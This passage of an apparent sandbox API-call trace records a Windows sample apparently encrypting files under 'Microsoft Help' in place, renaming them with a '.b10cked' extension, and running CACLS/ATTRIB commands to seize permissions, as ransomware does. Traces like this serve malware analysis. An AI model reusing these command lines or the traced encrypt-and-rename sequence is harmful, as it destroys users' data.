dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0195.955] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.955] ReleaseMutex (hMutex=0xf8) returned 1 [0195.955] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.955] ReleaseMutex (hMutex=0xf8) returned 1 [0195.955] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.955] ReleaseMutex (hMutex=0xf8) returned 1 [0195.956] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.956] ReleaseMutex (hMutex=0xf8) returned 1 [0195.956] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.HxD" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mvalidator.hxd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25274514061) returned 1 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x20ba [0195.957] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x25a2 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x25a2 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0196.044] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x12d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x12d0, lpOverlapped=0x0) returned 1 [0196.048] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0196.048] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x12d0, lpOverlapped=0x0) returned 1 [0196.048] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4816, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12d2 [0196.048] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x12d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x12d0, lpOverlapped=0x0) returned 1 [0196.048] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4816, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12d2 [0196.048] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x12d0, lpOverlapped=0x0) returned 1 [0196.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MValidator.HxD", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0196.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MValidator.HxD", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MValidator.HxD", lpUsedDefaultChar=0x0) returned 22 [0196.052] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x25a2 [0196.052] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0196.052] CloseHandle (hObject=0x120) returned 1 [0196.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.HxD", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD") returned 0x27 [0196.054] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0196.054] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbdc, dwThreadId=0xbf8)) returned 1 [0196.234] CloseHandle (hObject=0x1b4) returned 1 [0196.234] CloseHandle (hObject=0x120) returned 1 [0196.234] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0196.234] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0196.234] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0196.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0196.234] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0196.234] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4 [0196.234] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0196.234] CloseHandle (hObject=0x120) returned 1 [0196.235] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0196.235] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0196.235] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbc0, dwThreadId=0xe18)) returned 1 [0196.236] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0197.250] CloseHandle (hObject=0x1b4) returned 1 [0197.250] CloseHandle (hObject=0x120) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.253] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.253] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.254] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4 [0197.254] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.254] CloseHandle (hObject=0x120) returned 1 [0197.254] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.254] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.254] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.281] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25407085875) returned 1 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.283] SetFilePointer (in: 